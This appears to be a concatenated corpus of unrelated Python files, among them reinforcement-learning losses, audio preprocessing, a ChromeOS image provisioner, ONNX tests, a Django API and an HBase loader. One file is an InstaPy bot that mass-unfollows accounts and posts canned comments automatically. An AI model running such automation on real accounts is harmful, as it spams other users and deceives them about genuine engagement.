masks_batch,
actions_batch,
)
entropy_loss = (
self.pano_entropy_coef * entropy["pano"]
+ self.offset_entropy_coef * entropy["offset"]
+ self.distance_entropy_coef * entropy["distance"]
).mean() * self.entropy_coef
ratio = torch.exp(
action_log_probs - old_action_log_probs_batch
)
surr1 = ratio * adv_targ
surr2 = (
torch.clamp(
ratio, 1.0 - self.clip_param, 1.0 + self.clip_param
)
* adv_targ
)
action_loss = -torch.min(surr1, surr2).mean()
if self.use_clipped_value_loss:
value_pred_clipped = value_preds_batch + (
values - value_preds_batch
).clamp(-self.clip_param, self.clip_param)
value_losses = (values - return_batch).pow(2)
value_losses_clipped = (
value_pred_clipped - return_batch
).pow(2)
value_loss = (
0.5
* torch.max(value_losses, value_losses_clipped).mean()
)
else:
value_loss = 0.5 * (return_batch - values).pow(2).mean()
value_loss = value_loss * self.value_loss_coef
# slight regularization to the offset
offset_loss = 0.0
if "offset" in actions_batch:
offset_loss = self.offset_regularize_coef * l1_loss(
self.actor_critic.net.offset_to_continuous(
actions_batch["offset"]
),
torch.zeros_like(actions_batch["offset"]),
)
self.optimizer.zero_grad()
loss = value_loss + action_loss + offset_loss - entropy_loss
self.before_backward(loss)
loss.backward()
self.after_backward(loss)
self.before_step()
self.optimizer.step()
self.after_step()
value_loss_epoch += value_loss.item()
action_loss_epoch += action_loss.item()
entropy_loss_epoch += entropy_loss.item()
pano_entropy_epoch += entropy["pano"].mean().item()
offset_entropy_epoch += entropy["offset"].mean().item()
distance_entropy_epoch += entropy["distance"].mean().item()
num_updates = self.ppo_epoch * self.num_mini_batch
return (
value_loss_epoch / num_updates,
action_loss_epoch / num_updates,
entropy_loss_epoch / num_updates,
pano_entropy_epoch / num_updates,
offset_entropy_epoch / num_updates,
distance_entropy_epoch / num_updates,
)
| 5,532 | 1,566 |
import sys
import configs as cfg
from video2wav import Video2Wav_Converter
from segment_speech import Segment_Speech
from transcribe_speech import Transcribe_Speech
from utils import create_dir
def convert_video_to_wav():
create_dir(cfg.preprocessed_wav_savepath)
create_dir(cfg.extracted_wav_savepath)
v2w = Video2Wav_Converter(input_video_dataset_path=cfg.input_video_data_path,
input_file_format=cfg.input_video_format,
extracted_wav_savepath=cfg.extracted_wav_savepath,
acodec=cfg.acodec,
sampling_rate=cfg.wav_extraction_output_sampling_rate)
v2w.do()
def segment_speech():
create_dir(cfg.preprocessed_wav_savepath)
create_dir(cfg.segmented_wav_savepath)
ss = Segment_Speech(in_unsegmented_wav_path=cfg.unsegmented_input_wav_path,
out_wav_savepath = cfg.segmented_wav_savepath,
input_file_format = cfg.segmentation_input_wav_format,
sampling_rate = cfg.segmentation_source_sampling_rate,
resampling_rate = cfg.segmentation_output_resampling_rate,
min_silence_len=400,
keep_silence=100,
silence_chunk_len=100,
silence_thresh=-40,
skip_idx=0)
ss.do()
def transcribe_speech():
ts = Transcribe_Speech(in_segmented_wav_path = cfg.segmented_input_wav_path,
out_meta_filename = cfg.meta_name,
input_file_format = cfg.transcription_input_wav_format,
sampling_rate = cfg.transcription_audio_sampling_rate,
wav_channel = cfg.wav_channel,
language_code=cfg.language_code)
ts.do()
if __name__ == "__main__":
assert len(sys.argv) == 2, "[ERROR] option must be provided!"
if sys.argv[1] in [0, "0"]:
convert_video_to_wav()
elif sys.argv[1] in [1, "1"]:
segment_speech()
elif sys.argv[1] in [2, "2"]:
transcribe_speech()
| 1,791 | 754 |
import pandas as pd
dfm = pd.read_csv('h3.bed', sep='\t', header=None, index_col=None)
dfm.columns = ['chrom', 'start', 'end']
dfm['length'] = dfm['end'] - dfm['start']
dfm.to_csv('h3.tsv', sep='\t', index=None) | 216 | 96 |
# -*- coding: utf-8 -*-
# Copyright 2018 The Chromium OS Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Provision a recovery image for OOBE autoconfiguration.
This script populates the OOBE autoconfiguration data
(/stateful/unencrypted/oobe_auto_config/config.json) with the given parameters.
Additionally, it marks the image as being "hands-free", i.e. requiring no
physical user interaction to remove the recovery media before rebooting after
the recovery procedure has completed.
Any parameters prefixed with --x (e.g. --x-demo-mode) correspond directly to
generated elements in the configuration expected by OOBE.
"""
from __future__ import print_function
import json
import os
import sys
import uuid
from chromite.lib import commandline
from chromite.lib import constants
from chromite.lib import cros_build_lib
from chromite.lib import cros_logging as logging
from chromite.lib import image_lib
from chromite.lib import osutils
assert sys.version_info >= (3, 6), 'This module requires Python 3.6+'
# OOBE auto-config parameters as they appear in
# chrome/browser/chromeos/login/configuration_keys.h
# Please keep the keys grouped in the same order as the source file.
_CONFIG_PARAMETERS = (
('demo-mode', bool, 'Whether the device should be placed into demo mode.'),
('network-onc', str, 'ONC blob for network configuration.'),
('network-auto-connect', bool,
'Whether the network screen should automatically proceed with '
'connected network.'),
('eula-send-statistics', bool,
'Whether the device should send usage statistics.'),
('eula-auto-accept', bool,
'Whether the EULA should be automatically accepted.'),
('update-skip', bool,
'Whether the udpate check should be skipped entirely (it may be '
'required for future version pinning).'),
('wizard-auto-enroll', bool,
'Whether the wizard should automatically start enrollment at the '
'appropriate moment.'),
)
# Set of flags to specify when building with --generic.
_GENERIC_FLAGS = {
'network-auto-connect': True,
'eula-send-statistics': True,
'eula-auto-accept': True,
'update-skip': True,
}
# Mapping of flag type to argparse kwargs.
_ARG_TYPES = {
str: {},
bool: {'action': 'store_true'},
}
# Name of the OOBE directory in unencrypted/.
_OOBE_DIRECTORY = 'oobe_auto_config'
# Name of the configuration file in the recovery image.
_CONFIG_PATH = 'config.json'
# Name of the file containing the enrollment domain.
_DOMAIN_PATH = 'enrollment_domain'
def SanitizeDomain(domain):
"""Sanitized |domain| for use in recovery.
Args:
domain: (str) The original string.
Returns:
(str) The sanitized domain name, possibly using punycode to disambiguate.
"""
# Encode using punycode ("idna" here) to prevent homograph attacks.
# Once that's been normalized to ASCII, normalize to lowercase.
return domain.encode('idna').decode('utf-8').lower()
def GetConfigContent(opts):
"""Formats OOBE autoconfiguration from commandline namespace.
Args:
opts: A commandline namespace containing OOBE autoconfig opts.
Returns:
A JSON string representation of the requested configuration.
"""
conf = {}
for flag, _, _ in _CONFIG_PARAMETERS:
conf[flag] = getattr(opts, 'x_' + flag.replace('-', '_'))
if opts.wifi_ssid:
conf['network-onc'] = {
'GUID': str(uuid.uuid4()),
'Name': opts.wifi_ssid,
'Type': 'WiFi',
'WiFi': {
'AutoConnect': True,
'HiddenSSID': False,
'SSID': opts.wifi_ssid,
'Security': 'None',
},
}
if opts.use_ethernet:
conf['network-onc'] = {
'GUID': str(uuid.uuid4()),
'Name': 'Ethernet',
'Type': 'Ethernet',
'Ethernet': {
'Authentication': 'None',
},
}
return json.dumps(conf)
def PrepareImage(path, content, domain=None):
"""Prepares a recovery image for OOBE autoconfiguration.
Args:
path: Path to the recovery image.
content: The content of the OOBE autoconfiguration.
domain: Which domain to enroll to.
"""
with osutils.TempDir() as tmp, \
image_lib.LoopbackPartitions(path, tmp) as image:
stateful_mnt = image.Mount((constants.CROS_PART_STATEFUL,),
mount_opts=('rw',))[0]
# /stateful/unencrypted may not exist at this point in time on the
# recovery image, so create it root-owned here.
unencrypted = os.path.join(stateful_mnt, 'unencrypted')
osutils.SafeMakedirs(unencrypted, mode=0o755, sudo=True)
# The OOBE autoconfig directory must be owned by the chronos user so
# that we can delete the config file from it from Chrome.
oobe_autoconf = os.path.join(unencrypted, _OOBE_DIRECTORY)
osutils.SafeMakedirsNonRoot(oobe_autoconf, user='chronos')
# Create the config file to be owned by the chronos user, and write the
# given data into it.
config = os.path.join(oobe_autoconf, _CONFIG_PATH)
osutils.WriteFile(config, content, sudo=True)
cros_build_lib.sudo_run(['chown', 'chronos:chronos', config])
# If we have a plaintext domain name, write it.
if domain:
domain_path = os.path.join(oobe_autoconf, _DOMAIN_PATH)
osutils.WriteFile(domain_path, SanitizeDomain(domain), sudo=True)
cros_build_lib.sudo_run(['chown', 'chronos:chronos', domain_path])
def ParseArguments(argv):
"""Returns a namespace for the CLI arguments."""
parser = commandline.ArgumentParser(description=__doc__)
parser.add_argument('image', help='Path of recovery image to populate.')
# Prefix raw config elements with --x.
for flag, flag_type, help_text in _CONFIG_PARAMETERS:
parser.add_argument('--x-%s' % flag, help=help_text,
**_ARG_TYPES[flag_type])
parser.add_argument('--generic', action='store_true',
help='Set defaults for common configuration options.')
parser.add_argument('--dump-config', action='store_true',
help='Dump generated configuration file to stdout.')
parser.add_argument('--config', type='path', required=False,
help='Path to pre-generated configuration file to use, '
'overriding other flags set.')
parser.add_argument('--wifi-ssid', type=str, required=False,
help='If specified, generates an ONC for auto-connecting '
'to the given SSID. The network must not use any '
'security (i.e. be an open network), or the device '
'will fail to connect.')
parser.add_argument('--use-ethernet', action='store_true',
help='If specified, generates an ONC for auto-connecting '
'via ethernet.')
parser.add_argument('--enrollment-domain', type=str, required=False,
help='Text to visually identify the enrollment token in '
'recovery.')
opts = parser.parse_args(argv)
if opts.use_ethernet and opts.wifi_ssid:
parser.error('cannot specify --wifi-ssid and --use-ethernet together')
if opts.generic:
for opt, val in _GENERIC_FLAGS.items():
setattr(opts, 'x_' + opt.replace('-', '_'), val)
opts.Freeze()
return opts
def main(argv):
cros_build_lib.AssertInsideChroot()
opts = ParseArguments(argv)
if opts.config:
config_content = osutils.ReadFile(opts.config)
else:
config_content = GetConfigContent(opts)
logging.info('Using config: %s', config_content)
if opts.dump_config:
print(config_content)
PrepareImage(opts.image, config_content, opts.enrollment_domain)
| 7,762 | 2,397 |
import os
import sys
from Amazon import Amazon
from OpenStack import OpenStack
if sys.version_info.major < 2 and sys.version_info.minor < 7:
raise Exception("Python version 2.7 minimum is required for running this script.")
clouds = [OpenStack(), Amazon()]
for cloud in clouds:
cloud.create()
print('Press \'A\' to destroy instances created.')
consoleInput = os.read(0, 1)
while consoleInput != b'A':
consoleInput = os.read(0, 1)
for cloud in clouds:
cloud.destroy()
print("Delivrable terminated.")
| 524 | 165 |
import os
import unittest
from distutils.version import StrictVersion
from io import StringIO
import contextlib
import numpy
from numpy.testing import assert_almost_equal
import onnx
import onnxruntime
from onnx import numpy_helper, helper
from skl2onnx.algebra.onnx_ops import dynamic_class_creation
from skl2onnx.algebra import OnnxOperator
from skl2onnx.proto import onnx_proto
class TestMetaOnnx(unittest.TestCase):
def setUp(self):
self._algebra = dynamic_class_creation()
def test_dynamic_class_creation(self):
res = self._algebra
for cl in res:
assert hasattr(cl, '__init__')
assert hasattr(cl, '__doc__')
def test_mul(self):
from skl2onnx.algebra.onnx_ops import OnnxMul
assert OnnxMul.operator_name == 'Mul'
assert isinstance(OnnxMul('a', 'b'), OnnxOperator)
@unittest.skipIf(StrictVersion(onnx.__version__) < StrictVersion("1.5.0"),
reason="too unstable with older versions")
@unittest.skipIf(StrictVersion(onnxruntime.__version__) <
StrictVersion("0.5.0"),
reason="too unstable with older versions")
def test_onnx_spec(self):
untested = {'AveragePool', # issue with ceil_mode
'BitShift', # opset 11
'Cast', # unsupported type
'Compress', # shape inference fails
'CumSum', # opset 11
# Input X must be 4-dimensional. X: {1,1,3}
'ConvInteger',
'ConvTranspose',
'CumSum', # opset 11
'DepthToSpace', # opset 11
'DequantizeLinear',
'Equal', # opset 11
'Expand', # shape inference fails
'GatherElements', # opset 11
'MatMulInteger',
'MaxPool', # issue with ceil_mode
'Mod',
'QLinearConv',
'QLinearMatMul',
"QuantizeLinear",
"Round", # opset 11
'Scan', # Graph attribute inferencing returned type
# information for 2 outputs. Expected 1
# Node () has input size 5 not in range [min=1, max=1].
'ScatterElements', # opset 11
'Unique', # opset 11
"Upsample",
}
folder = os.path.dirname(onnx.__file__)
folder = os.path.join(folder, "backend", "test", "data", "node")
subs = os.listdir(folder)
for sub in subs:
path = os.path.join(folder, sub)
model = os.path.join(path, "model.onnx")
if not os.path.exists(model):
continue
dataset = os.path.join(path, "test_data_set_0")
inps = [os.path.join(dataset, "input_0.pb")]
outs = [os.path.join(dataset, "output_0.pb")]
if not os.path.exists(inps[0]) or not os.path.exists(outs[0]):
continue
for d in range(1, 9):
name = os.path.join(dataset, "input_%d.pb" % d)
if os.path.exists(name):
inps.append(name)
else:
break
for d in range(1, 9):
name = os.path.join(dataset, "output_%d.pb" % d)
if os.path.exists(name):
outs.append(name)
else:
break
tests = dict(model=model, inputs=inps, outputs=outs)
try:
op_type, success, reason = self._check_algebra_onnxruntime(
untested=untested, **tests)
except Exception as e:
raise Exception(
"Unable to handle operator '{}'".format(model)) from e
if __name__ == "__main__":
if not success:
print("-", op_type, " Failure", reason.split('\n')[0])
def _load_data(self, name):
tensor = onnx.TensorProto()
with open(name, 'rb') as fid:
content = fid.read()
tensor.ParseFromString(content)
return tensor
def _load_data_test(self, name, test):
try:
return self._load_data(name)
except Exception as e:
raise RuntimeError(
"Unable to load data '{}' for test '{}'"
".".format(name, test)) from e
def _check_algebra_onnxruntime(self, untested=None, model=None,
inputs=None, outputs=None):
if untested is None:
untested = {}
name = os.path.split(os.path.split(model)[0])[-1]
try:
onx = onnx.load(model)
except Exception as e:
raise RuntimeError(
"Unable to load model '{}' - '{}'.".format(name, model)) from e
inps = [self._load_data_test(input, name) for input in inputs]
outs = [self._load_data_test(output, name) for output in outputs]
if len(onx.graph.node) != 1:
op_type = ",".join([n.op_type for n in onx.graph.node])
return (op_type, False,
"The graph contains more than one node. Not tested.")
# get the operator to test
node = onx.graph.node[0]
op_class = self._algebra.get("Onnx" + node.op_type, None)
if op_class is None:
raise RuntimeError(
"Unable to find the corresponding operator in the algebra "
"'{}'.".format(node.op_type))
atts = {}
if node.attribute:
for att in node.attribute:
atts[att.name] = helper.get_attribute_value(att)
if len(node.input) != len(inps):
if node.op_type in untested:
return (node.op_type, False,
"unexpected number of inputs {} != {}".format(
len(node.output), len(outs)))
raise RuntimeError(
"'{}': unexpected number of inputs {} != {}.".format(
node.op_type, len(node.input), len(inps)))
if len(node.output) < len(outs):
raise RuntimeError(
"'{}': unexpected number of inputs {} != {}.".format(
node.op_type, len(node.output), len(outs)))
# See file onnx-ml.proto.
if inps[0].data_type in (onnx_proto.TensorProto.FLOAT16, ):
# not supported
return (node.op_type, False,
"Unsupported type {}".format(inps[0].data_type))
expected_data_type = (onnx_proto.TensorProto.UINT8,
onnx_proto.TensorProto.INT32,
onnx_proto.TensorProto.INT64,
onnx_proto.TensorProto.FLOAT,
onnx_proto.TensorProto.DOUBLE,
onnx_proto.TensorProto.BOOL,
onnx_proto.TensorProto.STRING)
if inps[0].data_type not in expected_data_type:
if node.op_type in untested:
return (node.op_type, False,
"unexpected data_type {} not in {}".format(
inps[0].data_type, expected_data_type))
raise NotImplementedError(
"Unexpected data_type {}: {}\n---\n{}\n---".format(
inps[0].data_type, node.op_type, inps[0]))
# prepare the inputs
inp_arrays = [numpy_helper.to_array(inp) for inp in inps]
out_arrays = [numpy_helper.to_array(out) for out in outs]
for i in range(len(inp_arrays)):
inp_array = inp_arrays[i]
if inp_array.dtype == numpy.float64:
inp_arrays[i] = inp_array.astype(numpy.float32)
inps[i] = numpy_helper.from_array(inp_arrays[i])
# check the test from onnx is working.
import onnxruntime as ort
monx = onx.SerializeToString()
try:
sess = ort.InferenceSession(monx)
except RuntimeError as e:
if node.op_type in untested:
return (node.op_type, False,
"cannot load ONNX model {}".format(e))
raise RuntimeError(
"'{}': cannot load(1) due to {}.".format(node.op_type, e))
names = [i.name for i in sess.get_inputs()]
ort_inputs = {name: inp_array for name,
inp_array in zip(names, inp_arrays)}
try:
Y = sess.run(None, ort_inputs)
except RuntimeError as e:
if node.op_type in untested:
return (node.op_type, False,
"cannot load skl2onnx model {}".format(e))
raise RuntimeError(
"'{}': cannot run(1) due to {}.".format(node.op_type, e))
for exp, got in zip(out_arrays, Y):
try:
assert_almost_equal(exp, got, decimal=4)
except TypeError:
pass
# instantiate the operator
for i, inp in enumerate(inps):
inp.name = 'I%d' % i
op = op_class(*[inp.name for inp in inps],
output_names=[out.name for out in outs],
**atts)
st = StringIO()
with contextlib.redirect_stdout(st):
with contextlib.redirect_stderr(st):
ort_inputs = {'I%d' % i: inp for i, inp in enumerate(inps)}
try:
onx2 = op.to_onnx(ort_inputs)
except (RuntimeError, NotImplementedError, TypeError) as e:
if node.op_type in untested:
return (node.op_type, False,
"cannot load skl2onnx model {}".format(e))
raise NotImplementedError(
"Unable to continue {}\n{}\n{}".format(
inp_array.dtype, st.getvalue(), ort_inputs)) from e
# test with onnxruntime
monx2 = onx2.SerializeToString()
try:
sess = ort.InferenceSession(monx2)
except RuntimeError as e:
if node.op_type in untested:
return (node.op_type, False,
"cannot load skl2onnx model {}".format(e))
raise RuntimeError("'{}': cannot load(2) due to {}\n"
"---ONNX--\n{}\n---SKL2ONNX---\n{}".format(
node.op_type, e, onx, onx2))
names = [i.name for i in sess.get_inputs()]
ort_inputs = {name: inp_array for name,
inp_array in zip(names, inp_arrays)}
try:
Y = sess.run(None, ort_inputs)
except RuntimeError as e:
if node.op_type in untested:
return (node.op_type, False,
"cannot load skl2onnx model {}".format(e))
raise RuntimeError("'{}': cannot run(2) due to {}\n"
"---ONNX--\n{}\n---SKL2ONNX---\n{}".format(
node.op_type, e, onx, onx2))
for exp, got in zip(out_arrays, Y):
try:
assert_almost_equal(exp, got, decimal=4)
except (TypeError, AssertionError):
pass
return node.op_type, True, ""
if __name__ == "__main__":
unittest.main()
| 11,466 | 3,402 |
from drink_partners.contrib.utils.points_distance import (
get_coordinate_distance_points
)
class TestCalculatePointsDistance:
def test_should_get_coordinate_distance_points(self):
point_a = [4, 0]
point_b = [6, 6]
assert get_coordinate_distance_points(
a=point_a,
b=point_b
) == 6.324555320336759
| 366 | 129 |
from tastypie import fields
from tastypie import http
from tastypie.resources import ModelResource, ALL, ALL_WITH_RELATIONS
from tastypie.exceptions import ImmediateHttpResponse
from ..mtapi import MTResource, MTAuthorization
from .models import Profile, Environment, Element, Category
import logging
logger = logging.getLogger(__name__)
class EnvironmentAuthorization(MTAuthorization):
"""Atypically named permission."""
@property
def permission(self):
"""This permission should be checked by is_authorized."""
return "environments.manage_environments"
class ProfileResource(MTResource):
"""Create, Read, Update, and Delete capabilities for Profile."""
class Meta(MTResource.Meta):
queryset = Profile.objects.all()
fields = ["id", "name"]
authorization = EnvironmentAuthorization()
ordering = ["id", "name"]
filtering = {
"name": ALL,
}
@property
def model(self):
"""Model class related to this resource."""
return Profile
class CategoryResource(MTResource):
"""Create, Read, Update and Delete capabilities for Category."""
elements = fields.ToManyField(
"moztrap.model.environments.api.ElementResource",
"elements",
full=True,
readonly=True
)
class Meta(MTResource.Meta):
queryset = Category.objects.all()
fields = ["id", "name"]
authorization = EnvironmentAuthorization()
ordering = ["id", "name"]
filtering = {
"name": ALL,
}
@property
def model(self):
"""Model class related to this resource."""
return Category
class ElementResource(MTResource):
"""Create, Read, Update and Delete capabilities for Element."""
category = fields.ForeignKey(CategoryResource, "category")
class Meta(MTResource.Meta):
queryset = Element.objects.all()
fields = ["id", "name", "category"]
authorization = EnvironmentAuthorization()
filtering = {
"category": ALL_WITH_RELATIONS,
"name": ALL,
}
ordering = ["id", "name"]
@property
def model(self):
"""Model class related to this resource."""
return Element
@property
def read_create_fields(self):
"""List of fields that are required for create
but read-only for update."""
return ["category"]
class EnvironmentResource(MTResource):
"""Create, Read and Delete capabilities for environments"""
elements = fields.ToManyField(ElementResource, "elements")
# an environment is not required to be associated with a profile
profile = fields.ForeignKey(ProfileResource, "profile", null=True)
class Meta(MTResource.Meta):
queryset = Environment.objects.all()
list_allowed_methods = ['get', 'post', 'patch']
detail_allowed_methods = ['get', 'put', 'delete']
fields = ["id", "profile", "elements"]
filtering = {
"elements": ALL,
"profile": ALL_WITH_RELATIONS,
}
ordering = ["id", "profile"]
@property
def model(self):
"""Model class related to this resource."""
return Environment
def hydrate_m2m(self, bundle):
"""Validate the elements,
which should each belong to separate categories."""
bundle = super(EnvironmentResource, self).hydrate_m2m(bundle)
elem_categories = [elem.data['category'] for elem in
bundle.data['elements']]
if len(set(elem_categories)) != len(bundle.data['elements']):
error_msg = "Elements must each belong to a different Category."
logger.error(error_msg)
raise ImmediateHttpResponse(
response=http.HttpBadRequest(error_msg))
return bundle
def patch_list(self, request, **kwargs):
"""
Since there is no RESTful way to do what we want to do, and since
``PATCH`` is poorly defined with regards to RESTfulness, we are
overloading ``PATCH`` to take a single request that performs
combinatorics and creates multiple objects.
"""
import itertools
from django.db import transaction
from tastypie.utils import dict_strip_unicode_keys
deserialized = self.deserialize(
request,
request.raw_post_data,
format=request.META.get('CONTENT_TYPE', 'application/json'))
# verify input
categories = deserialized.pop('categories', [])
if not categories or not isinstance(categories, list):
error_msg = "PATCH request must contain categories list."
logger.error(error_msg)
raise ImmediateHttpResponse(
response=http.HttpBadRequest(error_msg))
# do the combinatorics
elem_lists = []
for cat in categories:
# do some type validation / variation
if isinstance(cat, basestring):
# simple case of create all the combinations
cat = Category.objects.filter(id=self._id_from_uri(cat))
elem_list = Element.objects.filter(category=cat)
elif isinstance(cat, dict):
# we must be working with at least one partial category
category = Category.objects.filter(
id=self._id_from_uri(cat['category']))
elem_list = Element.objects.filter(category=category)
if 'exclude' in cat:
# exclude some element(s) from the combinations
exclude_uris = cat['exclude']
exclude_ids = [int(
self._id_from_uri(x)) for x in exclude_uris]
elem_list = [elem for elem in elem_list
if elem.id not in exclude_ids]
elif 'include' in cat:
# include only a few elements in the combinations
include_uris = cat['include']
include_ids = [int(
self._id_from_uri(x)) for x in include_uris]
elem_list = [elem for elem in elem_list
if elem.id in include_ids]
else:
# don't worry about this,
# it'll act like a list of categories
pass # pragma: no cover
else:
error_msg = "categories list must contain resource uris or hashes."
logger.error(error_msg)
raise ImmediateHttpResponse(
response=http.HttpBadRequest(error_msg))
# save off the elements from this category that will be used
elem_lists.append(elem_list)
# create all the combinations of elements from categories
combinatorics = itertools.product(*elem_lists)
# do the creation
with transaction.commit_on_success():
for combo in combinatorics:
deserialized['elements'] = combo
bundle = self.build_bundle(
data=dict_strip_unicode_keys(deserialized))
bundle.request.META['REQUEST_METHOD'] = 'PATCH'
self.is_valid(bundle, request)
self.obj_create(bundle, request=request)
# don't try to reply with data, the request doesn't
# really match the results.
return http.HttpAccepted()
| 7,526 | 1,893 |
#parar de seguir seguidores ...
from instapy import InstaPy
from instapy import smart_run
session = InstaPy(username='' , password='')
with smart_run(session):
session.set_do_follow(enabled=True, percentage=100)
session.set_do_like(enabled=True, percentage=100)
session.unfollow_users(amount=100, allFollowing=True, style="RANDOM", unfollow_after=3*60*60*60, sleep_delay=450)
# 'allfollowing =true' para de seguir qualquer um.
session.unfollow_users(amount=100, nonFollowers= True, style="RANDOM", unfollow_after=3*60*60*60, sleep_delay=450)
# 'nonfollowers =true' para de seguir quem não te segue.
comentarios = ['Very good', 'Nice short','Gostei do seu post', ':)', ':D', 'Parabens', 'Perfect :)','Muito bom', 'Very nice']
"""Comentarios pré definidos """
session.set_do_comment(enabled=True, percentage=95)
session.set_comments(comentarios,media='Photo')
session.join_pods()
| 937 | 349 |
from os.path import exists
from sys import argv
from dbbot import CommandLineOptions
class WriterOptions(CommandLineOptions):
@property
def output_file_path(self):
return self._options.output_file_path
def _add_parser_options(self):
super(WriterOptions, self)._add_parser_options()
self._parser.add_option('-o', '--output',
dest='output_file_path',
help='path to the resulting html file',
)
def _get_validated_options(self):
if len(argv) < 2:
self._exit_with_help()
options = super(WriterOptions, self)._get_validated_options()
if not options.output_file_path:
self._parser.error('output html filename is required')
if not exists(options.db_file_path):
self._parser.error('database %s not exists' % options.db_file_path)
return options
| 890 | 255 |
#!usr/bin/python
#coding:utf8
#mcd:max_common_divisor
def mcd(a, b):#a and b are natural numbers.
if a == b:
return a
t = min(a, b)
cd = [i for i in range(1, t+1) if a % i == 0 and b % i == 0]
m = max(cd)
return m | 223 | 113 |
#tarefa 4
#Jóvio L. Giacomolli
import numpy as np
#função sigmoide
def sigmoid(x):
return 1/(1 + np.exp(-x))
#arquitetura da MPL
n_input = 3
n_hidden = 4
n_output = 2
#vetor dos valores de entrada(aleatoria)
x = np.array([1, 2, 3])
#pesos camada oculta
weights_in_hidden = np.array([[0.2, 0.1, -0.9, 0.03],
[0.6, -0.8,0.9, 0.02],
[0.5, -0.6, 0.1, 0.01]])
#pesos camada de saida
weights_hidden_out = np.array([[-0.18, 0.11],
[-0.09, 0.05],
[-0.04, 0.05],
[-0.02, 0.07]])
#passagem forward pela rede
#camada oculta
#calcule a combinação linear de entradas e pesos sinápticos
#entrada camada oculta
hidden_layer_in = np.dot(x, weights_in_hidden)
#saída camada oculta
hidden_layer_out = sigmoid(hidden_layer_in)
#camada de saida
output_layer_in = np.dot(hidden_layer_out, weights_hidden_out)
#aplicar a função de ativação
output_layer_out = sigmoid(output_layer_in)
print('As saídas da rede são {}' .format(output_layer_out)) | 1,129 | 498 |
from thrift.transport import TSocket,TTransport
from thrift.protocol import TBinaryProtocol
from hbase import Hbase
from hbase.ttypes import ColumnDescriptor
from hbase.ttypes import Mutation
import csv
import os
import time
import logging
from tqdm import tqdm
# table: station, column: attr, row: date
def main():
socket = TSocket.TSocket('127.0.0.1',9090)
socket.setTimeout(5000)
transport = TTransport.TBufferedTransport(socket)
protocol = TBinaryProtocol.TBinaryProtocol(transport)
client = Hbase.Client(protocol)
socket.open()
table_list = client.getTableNames()
start = time.time()
logging.basicConfig(format='%(asctime)s | %(levelname)s | %(message)s',
level=logging.INFO, datefmt='%Y-%m-%d %H:%M:%S')
logging.info('Initiating task: Taiwan Air Quality!')
Attributes = ['AMB_TEMP','CO','NO','NO2','NOx','O3','PM10','PM2.5','RAINFALL','RAIN_COND','UVB',
'RH','SO2','WD_HR','WIND_DIREC','WIND_SPEED','WS_HR','CH4','NMHC','THC','PH_RAIN']
csvfiles = [filename for filename in os.listdir(os.getcwd()) if filename.endswith('.csv')]
logging.info(str(csvfiles))
InsertCounts = 0
for file in csvfiles:
with open(file, newline='') as f:
frames = csv.reader(f)
table_Name = ''
logging.info("Start reading {0}".format(file))
Column_Descriptors = []
ctr = 0
# length = sum(1 for row in frames)
#
# for frame in tqdm(frames, total=length):
for frame in tqdm(frames):
if ctr == 0:
ctr += 1
continue
elif ctr == 1:
ctr += 1
table_Name = str(str.encode(frame[1],'utf-8')).replace('\\',"")
table_Name = table_Name.replace("b","")
table_Name = table_Name.replace("'","")
if table_Name not in table_list:
for type in Attributes:
Column_Descriptors.append(ColumnDescriptor(name=type))
client.createTable(table_Name,Column_Descriptors)
logging.info('Build Table : {0}'.format(table_Name))
else:
logging.info('Table {0} already exist, no need to create'.format(table_Name))
# ['2018/01/02', 'iilan', 'NOx', '5.1', '4.4', '3.5', '2.1', '2.5', '3.2', '4.6', '15',
# '13', '11', '7', '6.8', '7.1', '13', '13', '12', '13', '16', '24', '23', '20', '24', '18', '13']
for i in range(3,26):
qualifier = i-2
value = frame[i]
row = frame[0] # date
column = frame[2] # attr
mutate = Mutation(column=column+':'+str(qualifier),value=value)
client.mutateRow(table_Name, frame[0], [mutate])
InsertCounts += 1
end = time.time()
logging.info("================Insert Done================\n")
logging.info("totalInsertCount: {0}, totalTimeSpend: {1}\n".format(InsertCounts,end-start))
logging.info(client.getTableNames())
if __name__ == '__main__':
main() | 3,273 | 1,064 |
"""Create PKCS11 Key."""
import pkcs11
from pkcs11.util.ec import encode_named_curve_parameters
if __name__ == "__main__":
lib = pkcs11.lib("/usr/lib/softhsm/libsofthsm2.so")
token = lib.get_token(token_label="token")
with token.open(rw=True, user_pin="1234") as session:
session.generate_keypair(
pkcs11.KeyType.RSA, 2048, label="small_rsa_key", store=True
)
session.generate_keypair(
pkcs11.KeyType.RSA, 4096, label="big_rsa_key", store=True
)
session.generate_keypair(pkcs11.KeyType.DSA, 2048, label="dsa_key", store=True)
ecparams = session.create_domain_parameters(
pkcs11.KeyType.EC,
{pkcs11.Attribute.EC_PARAMS: encode_named_curve_parameters("secp256r1")},
local=True,
)
ecparams.generate_keypair(store=True, label="ec_key")
| 873 | 341 |
class PyAsiceError(Exception):
"""
A generic exception that can happen while dealing with ASic-E/BDoc 2 files/signatures
"""
pass
class ContainerError(PyAsiceError):
pass
class NoFilesToSign(PyAsiceError):
pass
class SignatureVerificationError(PyAsiceError):
pass
class InvalidSignatureAlgorithm(SignatureVerificationError):
pass
| 371 | 113 |
from keras import backend as K
from keras.objectives import categorical_crossentropy
import tensorflow as tf
lambda_rpn_regr=1.0
lambda_rpn_class=1.0
lambda_cls_regr=1.0
lambda_cls_class=1.0
epsilon=1e-4
def rpn_loss_regr(num_anchors):
def rpn_loss_regr_fixed_num(y_true,y_pred):
x=y_true[:,:,:,4*num_anchors:]-y_pred
x_abs=K.abs(x)
x_bool=K.cast(K.less_equal(x_abs,1.0),tf.float32)
return lambda_rpn_regr * K.sum(
y_true[:, :, :, :4 * num_anchors] * (x_bool * (0.5 * x * x) + (1 - x_bool) * (x_abs - 0.5))) / K.sum(
epsilon + y_true[:, :, :, :4 * num_anchors])
return rpn_loss_regr_fixed_num
def rpn_loss_cls(num_anchors):
def rpn_loss_cls_fixed_num(y_true, y_pred):
if K.image_dim_ordering() == 'tf':
return lambda_rpn_class * K.sum(y_true[:, :, :, :num_anchors] * K.binary_crossentropy(y_pred[:, :, :, :],
y_true[:, :, :,
num_anchors:])) / K.sum(
epsilon + y_true[:, :, :, :num_anchors])
else:
return lambda_rpn_class * K.sum(y_true[:, :num_anchors, :, :] * K.binary_crossentropy(y_pred[:, :, :, :],
y_true[:,
num_anchors:, :,
:])) / K.sum(
epsilon + y_true[:, :num_anchors, :, :])
return rpn_loss_cls_fixed_num
def class_loss_regr(num_classes):
def class_loss_regr_fixed_num(y_true, y_pred):
x = y_true[:, :, 4 * num_classes:] - y_pred
